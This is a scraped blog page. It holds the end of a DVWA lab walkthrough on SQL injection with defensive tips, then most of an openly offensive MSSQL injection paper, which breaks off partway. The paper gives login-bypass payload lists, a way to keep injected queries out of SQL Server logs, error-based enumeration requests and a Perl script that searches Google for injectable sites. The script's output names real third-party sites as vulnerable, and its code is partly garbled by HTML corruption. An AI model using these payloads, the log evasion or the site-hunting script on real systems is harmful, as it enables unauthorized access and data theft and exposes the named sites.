padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘<span style="color: red;">\’Malley</span>‘ at line 1</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Note that there is now a \ in front of our single quote. In SQL a \ will cause certain characters be taken literally. Instead of interpreting the single quote as an escape from “</span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">user_id=’</span></span><span style="font-family: Consolas, serif;">“, it is interpreted as text.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span> <span style="color: red;"><span style="font-family: Consolas, serif;">1 OR 1=1</span></span><span style="color: #0099ff;"><span style="font-family: Consolas, serif;">‘</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">As we can see, if we avoid certain characters, we can still trick the server into running our injection phrase. Play around with the previously mentioned injection phrases – but first remove any quotes. Many of the above injection phrases will still work without quotes.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Protect Yourself from SQL Injection:</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Hopefully this walkthrough has shown how important it is to protect your site against SQL injection. NEVER take user input and place it directly into a SQL query. Always sanitize user input. Watch for characters like ‘,”,_,%,</span><em>\x00</em>,<em>\n</em>,<em>\r</em>,<em>\</em>,<em></em><em></em> and <em>\x1a</em>.<span style="font-family: Consolas, serif;"> If possible create a whitelist of what characters are acceptable, and don’t make it contain any more than you need. Limit user input by length (and make sure the user can’t send data greater than expected by modifying the form’s HTML). If only one result is to be expected – return only one result. If you are using PHP and MySQL, it is often best to assign the input to a variable, and then pass it through the stripslashes() and then the mysql_real_escape_string()function. Once this is done, SQL injection will much more difficult – for a query like we were working with, it should become impossible. Avoid displaying server errors when possible. Always make sure to use a least-privileged database account.Test…test….test. There are many automated SQL Injection tools. I recommend using these tools to test your code. Having a professional code audit is never a bad idea either.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>Sources</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">To give credit where it is due – The following sites were referenced while creating this walkthrough. I would highly recommend checking them out:</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><a href="http://www.apachefriends.org/en/xampp.html" style="color: #a2a2a2; text-decoration: underline;">http://www.apachefriends.org/en/xampp.html</a> – The XAMPP site</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><a href="http://sourceforge.net/projects/dvwa/" style="color: #a2a2a2; text-decoration: underline;">http://sourceforge.net/projects/dvwa/</a> – Download location for DVWA</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><a href="http://www.youtube.com/watch?v=GzIj07jt8rM" style="color: #a2a2a2; text-decoration: underline;">http://www.youtube.com/watch?v=GzIj07jt8rM</a> – The official DVWA install video, showing how to install DVWA with XAMPP.</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://en.wikipedia.org/wiki/SQL_Injection" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://en.wikipedia.org/wiki/SQL_Injection</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://unixwiz.net/techtips/sql-injection.html" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://unixwiz.net/techtips/sql-injection.html</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://sqlzoo.net/hack/24table.htm" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://sqlzoo.net/hack/24table.htm</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.greensql.net/publications/backdoor-webserver-using-mysql-sql-injection" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://www.greensql.net/publications/backdoor-webserver-using-mysql-sql-injection</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://w3schools.com/sql/default.asp" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://w3schools.com/sql/default.asp</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://msdn.microsoft.com/en-us/library/ff648339.aspx" style="color: #a2a2a2; text-decoration: underline;">http://msdn.microsoft.com/en-us/library/ff648339.asp</a></li>
</ul><div><span class="Apple-style-span" style="color: white; font-family: Arial; font-size: small;"><span class="Apple-style-span" style="font-size: 13px; line-height: 18px;">Reference:</span></span></div><div><span class="Apple-style-span" style="color: white; font-family: Arial; font-size: small;"><span class="Apple-style-span" style="font-size: 13px; line-height: 18px;"><a href="http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa/">http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa/</a></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-5651809157153565152010-07-05T00:18:00.000-07:002010-07-05T00:18:50.521-07:00Dating is rough at the transport layer<div class="separator" style="clear: both; text-align: center;"><a href="http://blog.ksplice.com/wp-content/uploads/2010/04/ksplice-synack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://blog.ksplice.com/wp-content/uploads/2010/04/ksplice-synack.png" width="203" /></a></div><br />
<a href="http://blog.ksplice.com/2010/04/dating-is-rough-at-the-transport-layer/#comments" target='_blank'>http://blog.ksplice.com/2010/04/dating-is-rough-at-the-transport-layer/#comments</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-1018225470130531272010-06-02T06:52:00.001-07:002010-06-02T06:52:36.457-07:00Full MSSQL Injection PWNage<span class="Apple-style-span" style="font-size: 16px;"></span><br />
<pre>|=--------------------------------------------------------------------=|
|=----------------=[ Full MSSQL Injection PWNage ]=-----------------=|
|=-----------------------=[ 28 January 2009 ]=------------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Full MSSQL Injection PWNage
Author : ZeQ3uL && JabAv0C
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-01-28
##########
Contents
##########
[0x00] - Introduction
[0x01] - Know the Basic of SQL injection
[0x01a] - Introduction to SQL Injection Attack
[0x01b] - How to Test sites that are Vulnerable in SQL Injection
[0x01c] - Bypass Authentication with SQL Injection
[0x01d] - Audit Log Evasion
[0x01e] - (Perl Script) SQL-Google searching vulnerable sites
[0x02] - MSSQL Normal SQL Injection Attack
[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
[0x02b] - ODBC Error Message Attack with "CONVERT"
[0x02c] - MSSQL Injection with UNION Attack
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)
[0x03] - MSSQL Blind SQL Injection Attack
[0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
[0x03b] - Determine data through Blind SQL Injection
[0x03c] - Exploit Query for get Table name
[0x03d] - Exploit Query for get Column name
[0x04] - More Dangerous SQL Injection Attack
[0x04a] - Dangerous from Extended Stored Procedures
[0x04b] - Advanced SQL Injection Techniques
[0x04c] - Mass MSSQL Injection Worms
[0x05] - MSSQL Injection Cheat Sheet
[0x06] - SQL Injection Countermeasures
[0x07] - References
[0x08] - Greetz To
#######################
[0x00] - Introduction
#######################
Welcome reader, this paper is a short attempt at documenting a practical technique
we have been working on. This papers will guide about technique that allows the attackers
(us) gaining access into the process of exploiting a website via SQL Injection Techniques
that we focused on MSSQL only
This paper is divided into 8 sections but only from section 0x01 to 0x06
are about technical information.
Section 0x01, we talk about basic knowledge of SQL injection vulnverabilities which
are classified into two types, normal and blind. Section 0x02, we give a detail of each way
attacking through SQL injection. Section 0x03, we explain the way to enumerate data through
blind sql injection technique. Section 0x04, we show more dangerous approaches which can occur
through SQL injection vulnerabilities. Section 0x05, we collect MSSQL queries in several purposes.
Section 0x06, we offer some tips in order to prevent the system from SQL injection attack.
##########################################
[0x01] - Know the Basic of SQL injection
##########################################
SQL injection vulnerabilities occur when the database server can be made to execute arbitrary SQL
(Structured Query Language) commands. Typically executed through the web application front end (use interface,
form, etc.), the attack involves entering malformed or unexpected SQL statements which result in unauthorized
execution of SQL commands on the database server.
++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - Introduction to SQL Injection Attack
++++++++++++++++++++++++++++++++++++++++++++++++
SQL injection attacks occur when malicious SQL commands are injected into a predefined SQL query
in order to alter the outcome of the query. Take the example of an application that requests a user id
for authentication. The application adds this user ID to a predefined SQL query to perform authentication.
However, if instead of providing a valid user name the attacker inputs a specialized SQL command
that forces the termination of the predefined SQL query and forces the execution of a new SQL query. In this
way the attacker can execute any SQL command on the host system without even needing to log in.
A successful SQL injection exploit can read sensitive data from the database, modify database data
(Insert/Update/Delete), execute administration operations on the database (such shutdown the DBMS), recover
the content of a given file present on the DBMS filesystem and in some cases issue commands to the operating system.
An application is vulnerable to SQL injection attack when:
- User input is incorrectly filtered for string literal escape characters embedded in SQL statements.
- User input is either not restricted ? e.g. through strong typing - and thereby can be made to execute
in an unexpected manner
SQL Injection always occur in application that needs to talk to a Database include:
- Authentication forms (Login Pages)
- Search forms
- E-Commerce sites
- Forum / Webboard
- Content Manage System (CMS's that use DB),Such as:
Joomla Components (http://www.milw0rm.com/search.php?dong=joomla)
Mambo Components (http://www.milw0rm.com/search.php?dong=mambo)
Wordpress Plugin (http://www.milw0rm.com/search.php?dong=wordpress)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - How to Test sites that are vulnerable in SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
We must make a list of all input fields whose values could be used in crafting a SQL query,
including the hidden fields of POST requests and then test them separately, trying to interfere with
the query and to generate an error. The very first test usually consists of adding a single quote (')
, double quote ("") or a semicolon (;) to the field under test.
[Simple URL] http://www.example.com/news.asp?id=10
[Test SQLi] http://www.example.com/news.asp?id=10'
It's vulnerable in SQL injection,If the output some error like this:
[HTTP Response]-----------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------
Next solution, Use "OR/AND" Operation for testing SQL injection vulnerability:
If contains is the different as original URL that dump all data
from database, It's vulnerable in SQL injection.
[Simple URL] http://www.example.com/news.asp?id=2
[output]------------------------------------------------------------------------------------
News: 2
Details: Preventing blind SQL injection attacks, Most security professionals know ...
[End Output]--------------------------------------------------------------------------------
[Test SQLi] http://www.example.com/news.asp?id=2' or '1'='1
[output]------------------------------------------------------------------------------------
News: 1
Details: SQL injection attack infects hundreds of thousands of websites ...
News: 2
Details: Preventing blind SQL injection attacks, Most security professionals know ...
News: 3
Details: Mass SQL injection, There's another round of mass SQL injections going on which has infected ...
News: 4
Details: New Botnet Malware Spreading SQL injection attack tool ...
[End Output]--------------------------------------------------------------------------------
That's Great !! Can you see something different from original URL ? (It's Vuln in SQL Injection Attacks),
It's return all query from DB, Why ??
[ASP_code]
var sql = "SELECT * FROM news WHERE id = '" + getid +"'";
[End ASP_code]
[Final query //id=2]
SELECT * FROM news WHERE id = '2' // It's will return News 2
[End id=2]
[Final query //id=2' or 'a'='a] // Testing SQLi Vuln
SELECT * FROM news WHERE id = '2' or 'a'='a' // It's include ' or 'a'='a into SQL statement and the condition is TRUE,
// So It will return all news (id=1,2,3,...)
[End id=2' or 'a'='a]
++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01c] - Bypass Authentication with SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++
This basic technique for "bypass Login" when application use DB to checking authentication.
However, an attacker may possibly bypass this check with SQL injection.
[Example scripts]
+-----------------------------+
| ' or 1=1 -- |
| a' or 1=1 -- |
| " or 1=1 -- |
| a" or 1=1 -- |
| ' or 1=1 # |
| " or 1=1 # |
| or 1=1 -- |
| ' or 'x'='x |
| " or "x"="x |
| ') or ('x'='x |
| ") or ("x"="x |
| ' or username LIKE '%admin% |
+-----------------------------+
| USERNAME: ' or 1/* |
| PASSWORD: */ =1 -- |
+-----------------------------+
| USERNAME: admin' or 'a'='a |
| PASSWORD: '# |
+-----------------------------+
[Login ASP_code]----------------------------------------------------------------------------
var sql = "SELECT * FROM users WHERE username = '" + formusr + "' AND password ='" + formpwd + "'";
[End Login ASP_code]------------------------------------------------------------------------
When we input something like this:
formusr = admin
formpwd = ' or 'a='a
[SQL Query]---------------------------------------------------------------------------------
SELECT * FROM users WHERE username = 'admin' AND password = '' or 'a'='a'
[End Code]----------------------------------------------------------------------------------
This SQL condition is TRUE and bypass login process, So you don't need admin's password. (Just use ' or 'a'='a)
If we input something like this
formusr = ' or 1=1 --
formpwd = anything
[SQL Query]---------------------------------------------------------------------------------
SELECT * FROM users WHERE username = '' or 1=1 -- AND password = 'anything'
[End Code]----------------------------------------------------------------------------------
** Note **
-- is comment operator of MSSQL DB used to comment out everything following this operator.
/*Comment*/ Inline comment, Comments out rest of the query by not closing them / Bypass blacklisting.
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then
you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash
of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
formusr = admin
formpwd = pass ' AND 1=2 UNION ALL SELECT 'admin', '1a1dc91c907325c69271ddf0c944bc72
1a1dc91c907325c69271ddf0c944bc72 = MD(pass)
+++++++++++++++++++++++++++++
[0x01d] - Audit Log Evasion
+++++++++++++++++++++++++++++
When we injection some code with SQLi Techniques, All of the SQL queries can be logged and admin can know what's happen ?
The technique for evade logging, We use "sp_password"
formusr = ' or 1=1 -- sp_password
formpwd = anything
SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries
it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible).
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01e] - (Perl Script) SQL-Google searching vulnerable sites
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The Good way to searching sites that have SQL injection vulnerability is "Google"
(That powerful to use every search engines to searching with IRCbots). We developed simple Perl script for
searching SQL injection holes (MSSQL, Mysql, MS Access, Oracle) name "SQL-Google Search":
[code]-----------------------------------------------------------------------------------
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
print "+++++++++++++++++++++++++++++++\n";
print "+ SQL - Google Search +\n";
print "+ CWH Underground +\n";
print "+++++++++++++++++++++++++++++++\n\n";
print "Insert Dork:";
chomp( my $dork = <stdin> );
print "Total Query Pages (10 Links/Pages) :";
chomp( my $page = <stdin> );
print "\n[+] Result:\n\n";
for($start = 0;$start != $page*10;$start += 10)
{
$t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
$ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a $line(@stuff)="" $out="$1;" $ua="LWP::UserAgent-" \"="" class="l/ig)" foreach="" g;="" href="http://www.blogger.com/,$c);" if($line="~/(.*)" s="" {="">new(agent => 'Mozilla 5.2');
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
{print "$out => Could be Vulnerable in MySQL Injection!!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
{print "$out => Could be Vulnerable in MS Access Injection!!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
{print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out => Could be Vulnerable in Oracle Injection!!\n";}
}
}
}
}
[End code]----------------------------------------------------------------------------------
[output]------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++
+ SQL - Google Search +
+ CWH Underground +
+++++++++++++++++++++++++++++++
Insert Dork:index.asp?sid=
Total Query Pages (10 Links/Pages) :5
[+] Result:
http://www.ris.org.uk/index.asp?sid=7&mid=5' => Could be Vulnerable in MSSQL Injection!!
http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307' => Could be Vulnerable in MSSQL Injection!!
http://www.ilri.org/research/Index.asp?SID=4' => Could be Vulnerable in MSSQL Injection!!
[End output]--------------------------------------------------------------------------------
############################################
[0x02] - MSSQL Normal SQL Injection Attack
############################################
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
We can use information from error message produced by the MS SQL Server to get almost any data we want.
- "GROUP BY" is a microsoft sql server command used to group output of particular sql query.
- "HAVING" is a command used to specify a search condition for a group or an aggregate.
this command is always used with "GROUP BY" otherwise the error will return.
As the operation of these two commands, we can take advantage of them in order to
obtain particular table name and all column names of this table. We will explain you by using an example.
First, The target has a table called "news" and in news, there are three columns, which are news_id, news_author and news_detail.
The vulnerable page is http://www.example.com/page.asp?id=1
The query in this page is something like
[Query]-----------------------------------------------------------------------------
var query = "SELECT * FROM news WHERE news_id= '" + column+ "'";
[End query]-------------------------------------------------------------------------
So, we can inject HAVING command in order to observe returned error
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' HAVING 1=1--'
We will get the error as following:
------------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
------------------------------------------------------------------------------------
In this error, we know table name = "news", used in this page and
one column name = "news_id", contained in particular table.
The error is originate from using HAVING command without GROUP BY command.
Moreover, we can get the other column names by using combination of GROUP BY and HAVING command.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' GROUP BY news.news_id HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id HAVING 1=1--'
We will get the error
------------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
------------------------------------------------------------------------------------
Now, we know the second column name of table1 = "news_author". The third column name can be obtained
by adding the second column name in the previous query
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author HAVING 1=1--'
The request will generate following error
------------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
------------------------------------------------------------------------------------
The third column name = "news_detail", pops up in returned error. If we had more columns,
we could add news_detail in GROUP BY clause of previous request then we could get the forth column name.
When we added all of column in GROUP BY clause, we will get normal result and
we absolutely know that we obtained all column name in table1.
As this example, the request below will generate no error.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--
[End SQLi]--------------------------------------------------------------------------
The query will be
SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--'
As no error return, we know that table1 consists of three columns which are "news_id", "news_author" and "news_detail".
++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x02b] - ODBC Error Message Attack with "CONVERT"
++++++++++++++++++++++++++++++++++++++++++++++++++++
In our opinion, MSSQL expresses much information in returned error. It is useful for programmers to debug their application meanwhile
it is valuable for many attackers, as seeing in previous section.
In this section, we provide another method of utilizing from MSSQL error through a command called "convert".
convert command is used to convert between two data type and when the specific data cannot convert to another type,
this command will return error. let see through an example:
In this example, we show you how to obtain MSSQL_Version, DB_name, User_name.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)--
[End SQLi]--------------------------------------------------------------------------
Error Message returned:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007
22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
Now, We know the version of MSSQL and OS (Windows 2003 Server), Let's go to enumerate DB_name.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--
[End SQLi]--------------------------------------------------------------------------
Error Message returned:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
We can know the Database name = "cwhdb", Next is query for get current user that run DB.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--
[End SQLi]--------------------------------------------------------------------------
Error Message returned:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9
------------------------------------------------------------------------------------
W00t!! W00t!!, It use "sa" privileges lol. This information can help us that we can use extended
stored procedure "XP_CMDSHELL" to run arbitrary command executes.
In next example, we show you how to obtain table names, column names and data.
Take a look at our First request
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
[End SQLi]--------------------------------------------------------------------------
"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table. The result of this request is something like this:
------------------------------------------------------------------------------------
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9
------------------------------------------------------------------------------------
From the query, we get threads as a nvarchar data type and as it cannot convert from threads to int data type, the error is returned.
Therefore, we know the first table = "threads", from this error. The next step is looking for the second table.
We only put WHERE clause append the query in above request.
[SQLi]------------------------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
not+in+('threads')))--
